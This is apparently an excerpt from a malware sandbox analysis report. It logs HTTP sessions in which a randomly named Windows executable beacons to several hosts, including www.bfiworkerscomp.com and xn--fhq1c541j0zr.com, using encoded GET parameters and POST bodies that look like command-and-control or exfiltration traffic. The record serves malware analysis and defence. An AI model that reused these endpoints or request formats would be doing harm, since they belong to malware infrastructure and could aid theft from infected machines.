8	192.168.2.6	49730	208.91.197.27	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:41:30.062587976 CEST	525	OUT	GET /xzzi/?f6Gp=VzB4OR5&_Z1XhZu=9CTSfwlM5YWl8fva1LSaXKM8r2QUgbHW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/T7lrCl4emV2JC4YHgME2JKEwuO5dogcNSV3iaYHGGhbnU2ZhAGg= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.bfiworkerscomp.com Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Aug 9, 2024 08:41:31.351447105 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 09 Aug 2024 06:41:12 GMT Server: Apache Referrer-Policy: no-referrer-when-downgrade Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com") Set-Cookie: vsid=932vr47073127248133151; expires=Wed, 08-Aug-2029 06:41:12 GMT; Max-Age=157680000; path=/; domain=www.bfiworkerscomp.com; HttpOnly Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Connection: close Data Raw: 34 30 36 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 71 75 44 46 45 54 58 52 6e 30 48 72 30 35 66 55 50 37 45 4a 54 37 37 78 59 6e 50 6d 52 62 70 4d 79 34 76 6b 38 4b 59 69 48 6e 6b 4e 70 65 64 6e 6a 4f 41 4e 4a 63 61 58 44 58 63 4b 51 4a 4e 30 6e 58 4b 5a 4a 4c 37 54 63 69 4a 44 38 41 6f 48 58 4b 31 35 38 43 41 77 45 41 41 51 3d 3d 5f 6a 4d 74 47 4b 7a 55 45 4d 73 4b 59 53 52 41 39 75 78 38 57 6a 69 39 49 51 43 47 53 4a 54 46 52 6c 68 35 52 52 74 77 76 7a 68 45 37 61 4d 67 78 4a 6d 49 79 64 79 55 38 6f 67 57 32 64 68 6e 48 44 42 4c 71 6a 4c 48 35 61 58 43 65 42 30 63 6b 43 56 6a 33 62 41 3d 3d 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 [TRUNCATED] Data Ascii: 4068<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_jMtGKzUEMsKYSRA9ux8Wji9IQCGSJTFRlh5RRtwvzhE7aMgxJmIydyU8ogW2dhnHDBLqjLH5aXCeB0ckCVj3bA==" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-t
Aug 9, 2024 08:41:31.351501942 CEST	187	IN	Data Raw: 6f 2d 66 69 74 3d 6e 6f 22 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 62 66 69 77 6f 72 6b 65 72 73 63 6f 6d 70 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 2e 61 73 73 65 Data Ascii: o-fit=no"/> <title>bfiworkerscomp.com</title> <style media="screen">.asset_star0 {background: url('//d38psrni17bvxu.cloudfront.net/themes/assets/star0.gif') no-repeat center;
Aug 9, 2024 08:41:31.351516008 CEST	1236	IN	Data Raw: 77 69 64 74 68 3a 20 31 33 70 78 3b 0a 09 68 65 69 67 68 74 3a 20 31 32 70 78 3b 0a 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 7d 0a 0a 2e 61 73 73 65 74 5f 73 74 61 72 31 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a Data Ascii: width: 13px;height: 12px;display: inline-block;}.asset_star1 {background: url('//d38psrni17bvxu.cloudfront.net/themes/assets/star1.gif') no-repeat center;width: 13px;height: 12px;display: inline-block;}.asset_starH {backgro
Aug 9, 2024 08:41:31.351531029 CEST	1236	IN	Data Raw: 6d 70 2d 69 73 2d 70 61 72 6b 65 64 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 34 70 78 20 30 20 32 70 78 3b 0a 7d 0a 0a 2e 63 6f 6d 70 2d 73 70 6f 6e 73 6f 72 65 64 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 6d 61 72 Data Ascii: mp-is-parked { margin: 4px 0 2px;}.comp-sponsored { text-align: left; margin: 0 0 -1.8rem 4px;}.wrapper1 { margin:1rem;}.wrapper2 { background:url('//d38psrni17bvxu.cloudfront.net/themes/cleanPeppermintBlack_657d9013/img
Aug 9, 2024 08:41:31.351545095 CEST	1236	IN	Data Raw: 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 27 2f 2f 64 33 38 70 73 72 6e 69 31 37 62 76 78 75 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 74 68 65 6d 65 73 2f 63 6c 65 61 6e 50 65 70 70 65 72 6d 69 6e 74 42 6c 61 63 6b 5f 36 35 37 64 39 30 Data Ascii: background:url('//d38psrni17bvxu.cloudfront.net/themes/cleanPeppermintBlack_657d9013/img/arrows.png') no-repeat center top; padding-bottom:0; min-height:600px; } .wrapper3 { max-width:530px; background:
Aug 9, 2024 08:41:31.351557970 CEST	672	IN	Data Raw: 72 61 70 70 65 72 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 32 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 Data Ascii: rapper1"> <div class="wrapper2"> <div class="wrapper3"> <div style="padding-bottom: .5em; padding-top: .5em; border-radius: .125em; grid-template-columns: 1fr 1fr 1fr; display: inline-grid"> <div style="grid-col
Aug 9, 2024 08:41:31.351862907 CEST	1236	IN	Data Raw: 65 6c 66 3a 20 65 6e 64 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 3b 22 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 2d 74 65 78 74 2d 63 6f 6c 6f 72 22 3e 0a 20 20 20 20 Data Ascii: elf: end"> <span style="font-size: small;" class="header-text-color"> This Page Is Under Construction - Coming Soon! <br> <a class="header-text-color" target="_blank" href="//bfiworkerscomp.com/__media__/design/
Aug 9, 2024 08:41:31.351877928 CEST	1236	IN	Data Raw: 72 6b 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 22 3e 4c 65 67 61 6c 20 4e 6f 74 69 63 65 3c 2f 61 3e 0a 3c 62 72 2f 3e 3c 62 72 2f 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 Data Ascii: rksolutions.com/">Legal Notice</a><br/><br/> </div></div><script type="text/javascript" language="JavaScript"> var tcblock = { // Required and steady 'container': 'tc', 'type': 'relatedsearch', 'colo
Aug 9, 2024 08:41:31.351891994 CEST	1236	IN	Data Raw: 57 55 78 59 6a 64 69 59 6a 55 33 4e 6d 45 35 4e 6a 68 6a 4d 6a 55 78 4f 54 41 78 59 6a 56 69 5a 54 49 78 59 32 56 69 4f 47 59 7a 4e 6a 4e 6c 4d 6a 55 7a 4e 54 6b 32 4d 7a 41 77 4e 54 59 30 4d 6d 55 35 5a 44 4a 6c 4e 32 55 33 5a 54 45 36 4e 6a 5a Data Ascii: WUxYjdiYjU3NmE5NjhjMjUxOTAxYjViZTIxY2ViOGYzNjNlMjUzNTk2MzAwNTY0MmU5ZDJlN2U3ZTE6NjZiNWJhMWIzMzJlMg=='; let search=''; let themedata='fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fHx8fHw2NmI1YmExYjMzMjk0fHx8MTcyMzE4NTY5MS4
Aug 9, 2024 08:41:31.351907015 CEST	672	IN	Data Raw: 74 74 72 69 62 75 74 69 6f 6e 27 3a 20 27 23 62 37 62 37 62 37 27 2c 27 66 6f 6e 74 53 69 7a 65 41 74 74 72 69 62 75 74 69 6f 6e 27 3a 20 31 36 2c 27 61 74 74 72 69 62 75 74 69 6f 6e 42 6f 6c 64 27 3a 20 66 61 6c 73 65 2c 27 72 6f 6c 6c 6f 76 65 Data Ascii: ttribution': '#b7b7b7','fontSizeAttribution': 16,'attributionBold': false,'rolloverLinkBold': false,'fontFamilyAttribution': 'arial','adLoadedCallback': function(containerName, adsLoaded, isExperimentVariant, callbackOptions) {let data = {cont
Aug 9, 2024 08:41:31.357021093 CEST	1236	IN	Data Raw: 69 6f 6e 20 28 72 65 71 75 65 73 74 41 63 63 65 70 74 65 64 2c 20 73 74 61 74 75 73 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 20 3d 20 27 76 69 73 69 62 6c 65 27 3b 70 61 67 65 4c 6f 61 64 Data Ascii: ion (requestAccepted, status) {document.body.style.visibility = 'visible';pageLoadedCallbackTriggered = true;if ((status.faillisted === true \|\| status.faillisted == "true" \|\| status.blocked === true \|\| status.blocked == "true" ) && status.erro

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49732	43.252.167.188	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:41:46.390535116 CEST	803	OUT	POST /rm91/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.xn--fhq1c541j0zr.com Origin: http://www.xn--fhq1c541j0zr.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 212 Referer: http://www.xn--fhq1c541j0zr.com/rm91/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 5f 5a 31 58 68 5a 75 3d 75 51 31 62 6f 4f 54 4a 37 76 49 39 46 51 39 4f 55 2b 34 35 30 6c 42 42 64 6a 79 59 48 6a 6f 39 48 38 38 2f 6f 48 34 55 49 52 59 57 32 68 2b 37 42 37 64 54 2f 68 52 48 33 42 62 73 58 65 78 30 70 63 4b 46 2f 54 32 52 47 5a 78 6d 68 42 79 6b 50 78 54 6a 4c 73 49 63 76 33 48 77 73 68 51 6f 2b 2f 65 61 75 73 4d 70 4b 79 43 5a 34 50 44 2f 53 72 4f 6a 70 4d 57 52 4b 46 67 53 53 41 43 5a 2b 6b 61 64 6d 6f 69 67 41 59 50 42 38 46 76 68 64 70 57 68 6a 38 36 4c 70 45 53 68 32 7a 35 73 50 53 38 49 46 4d 4b 64 4a 6a 6f 4e 62 43 51 63 4a 33 38 78 65 77 71 6f 75 48 49 6c 66 73 46 30 52 41 38 31 53 32 52 2f 34 32 6c 51 Data Ascii: _Z1XhZu=uQ1boOTJ7vI9FQ9OU+450lBBdjyYHjo9H88/oH4UIRYW2h+7B7dT/hRH3BbsXex0pcKF/T2RGZxmhBykPxTjLsIcv3HwshQo+/eausMpKyCZ4PD/SrOjpMWRKFgSSACZ+kadmoigAYPB8FvhdpWhj86LpESh2z5sPS8IFMKdJjoNbCQcJ38xewqouHIlfsF0RA81S2R/42lQ
Aug 9, 2024 08:41:47.519009113 CEST	367	IN	HTTP/1.1 404 Not Found Date: Fri, 09 Aug 2024 06:49:03 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>
Aug 9, 2024 08:41:47.520350933 CEST	367	IN	HTTP/1.1 404 Not Found Date: Fri, 09 Aug 2024 06:49:03 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49733	43.252.167.188	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:41:48.922840118 CEST	827	OUT	POST /rm91/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.xn--fhq1c541j0zr.com Origin: http://www.xn--fhq1c541j0zr.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 236 Referer: http://www.xn--fhq1c541j0zr.com/rm91/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 5f 5a 31 58 68 5a 75 3d 75 51 31 62 6f 4f 54 4a 37 76 49 39 4b 54 6c 4f 57 63 51 35 6a 56 42 4f 52 44 79 59 49 44 6f 78 48 38 77 2f 6f 47 74 4a 49 45 49 57 33 46 36 37 43 2f 42 54 38 68 52 48 38 68 62 54 5a 2b 78 2f 70 63 33 6d 2f 53 61 52 47 5a 31 6d 68 41 43 6b 4d 43 37 6b 52 63 49 61 32 6e 48 75 7a 78 51 6f 2b 2f 65 61 75 73 49 51 4b 30 71 5a 35 36 4c 2f 54 4f 79 69 33 63 57 57 65 56 67 53 57 41 43 56 2b 6b 61 2f 6d 73 37 50 41 61 48 42 38 46 66 68 54 63 6a 33 74 38 36 4e 6e 6b 54 6c 34 47 64 6f 57 68 6c 50 62 63 57 62 64 41 6f 57 65 30 52 47 56 45 38 53 4d 67 4b 71 75 46 51 58 66 4d 46 65 54 41 45 31 41 68 64 59 33 43 41 7a 2f 4f 65 6f 69 5a 44 2f 4c 2f 2f 71 38 4f 39 70 64 53 47 61 63 51 3d 3d Data Ascii: _Z1XhZu=uQ1boOTJ7vI9KTlOWcQ5jVBORDyYIDoxH8w/oGtJIEIW3F67C/BT8hRH8hbTZ+x/pc3m/SaRGZ1mhACkMC7kRcIa2nHuzxQo+/eausIQK0qZ56L/TOyi3cWWeVgSWACV+ka/ms7PAaHB8FfhTcj3t86NnkTl4GdoWhlPbcWbdAoWe0RGVE8SMgKquFQXfMFeTAE1AhdY3CAz/OeoiZD/L//q8O9pdSGacQ==
Aug 9, 2024 08:41:49.780344009 CEST	367	IN	HTTP/1.1 404 Not Found Date: Fri, 09 Aug 2024 06:49:06 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49734	43.252.167.188	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:41:51.457956076 CEST	1840	OUT	POST /rm91/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.xn--fhq1c541j0zr.com Origin: http://www.xn--fhq1c541j0zr.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1248 Referer: http://www.xn--fhq1c541j0zr.com/rm91/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 5f 5a 31 58 68 5a 75 3d 75 51 31 62 6f 4f 54 4a 37 76 49 39 4b 54 6c 4f 57 63 51 35 6a 56 42 4f 52 44 79 59 49 44 6f 78 48 38 77 2f 6f 47 74 4a 49 48 6f 57 33 77 75 37 41 65 42 54 39 68 52 48 78 42 62 57 5a 2b 78 75 70 63 66 36 2f 53 47 6e 47 63 70 6d 6a 69 36 6b 59 6a 37 6b 45 4d 49 61 35 48 48 76 73 68 51 35 2b 2f 50 54 75 74 34 51 4b 30 71 5a 35 39 37 2f 58 62 4f 69 31 63 57 52 4b 46 67 57 53 41 44 41 2b 6b 44 49 6d 73 76 6c 56 36 6e 42 6c 6c 50 68 65 4f 37 33 79 4d 36 50 6d 55 54 44 34 47 59 32 57 69 42 6c 62 66 4b 78 64 43 30 57 66 78 51 41 41 6d 73 61 53 47 65 51 39 45 6f 4d 45 63 4a 38 62 43 38 37 44 67 6f 72 38 43 4d 58 78 4b 69 46 32 4a 53 37 4f 64 66 66 30 59 41 56 65 53 50 64 45 43 76 35 70 6c 41 61 42 70 6a 49 2f 76 72 59 67 2f 49 35 4f 33 31 63 52 45 39 59 30 34 5a 47 62 50 66 32 72 2b 4e 2b 37 56 76 4e 31 31 42 50 69 68 31 5a 4d 4f 70 6a 73 43 73 47 51 34 43 50 35 42 78 58 32 35 59 6f 47 6f 35 70 39 58 56 4e 64 64 51 43 36 69 56 30 55 36 31 65 34 69 56 38 36 34 65 50 49 39 54 78 49 53 [TRUNCATED] Data Ascii: _Z1XhZu=uQ1boOTJ7vI9KTlOWcQ5jVBORDyYIDoxH8w/oGtJIHoW3wu7AeBT9hRHxBbWZ+xupcf6/SGnGcpmji6kYj7kEMIa5HHvshQ5+/PTut4QK0qZ597/XbOi1cWRKFgWSADA+kDImsvlV6nBllPheO73yM6PmUTD4GY2WiBlbfKxdC0WfxQAAmsaSGeQ9EoMEcJ8bC87Dgor8CMXxKiF2JS7Odff0YAVeSPdECv5plAaBpjI/vrYg/I5O31cRE9Y04ZGbPf2r+N+7VvN11BPih1ZMOpjsCsGQ4CP5BxX25YoGo5p9XVNddQC6iV0U61e4iV864ePI9TxIS7t0shuuuj57tcnZRtq4MrWkMdl1EGWm+gW0nuiNT/QmNta03MUZlbhp7HtEPTWNXjDfqqUXnn4qT/JySzMsKTqOHEOjIc7gh/HQqK3z5phRmjRMaTo3Yn24vwtWgQ56NbSry19+hyXxRZZvcfdnSOGpy9BYy/jJntSaVcVOet+BGitug1hxmRfBhN63iuW6n8HAXyf6fJS1KcKrGhp76NFDrK0alA79D0Ug1OGxM/DFPgaLLffOfDxQcMhjF/KfyV71OQC2MoVbeQw1sEDjV7oNFn8DIQw+j+k9QnL+SQflnePAtRT+NdziTBO4GzSd34i7WvT2iV1Tm1QLJIJ+j1uNtXMQlDRhifEYk56SgibmEMkuOQkLkR3mGalz8yADpLpM5QnX2kM0TSqhxwRfjejfs+QbPC366ZXg0sl9cOKlktiZKbXtfi5MO+MYzLC9a8IkbKSv4ejRvSGDAes8hUvT0aVT2P1Hc7M6RTOXskYmyb2Ha1Es9hi375e2W2eDL94j/31tEK/41y0wAY7InTaFU7vAeH9XmfzWzZ6DdOoVAjHCJ705hARx1zpI029TrjhL3AmcSQQKz1Hf535aRCkHqbZKH0yWIGNetfFCDTsSkzUPjb5QLnDWxLUmV9xk5YAIP8rTk4iJVqM2VwETqeyhVVktOQhpSvl [TRUNCATED]
Aug 9, 2024 08:41:52.326415062 CEST	367	IN	HTTP/1.1 404 Not Found Date: Fri, 09 Aug 2024 06:49:08 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49735	43.252.167.188	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:41:54.654928923 CEST	527	OUT	GET /rm91/?f6Gp=VzB4OR5&_Z1XhZu=jSd7r+67+N1qAQkxX/tAwzcZagSYI1kZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WH/0swiWusA81psiewdkdfDrQ0sPpSZKio/bNAkJ8aUrwxHfI1oA= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.xn--fhq1c541j0zr.com Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Aug 9, 2024 08:41:55.512960911 CEST	367	IN	HTTP/1.1 404 Not Found Date: Fri, 09 Aug 2024 06:49:11 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49736	194.9.94.85	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
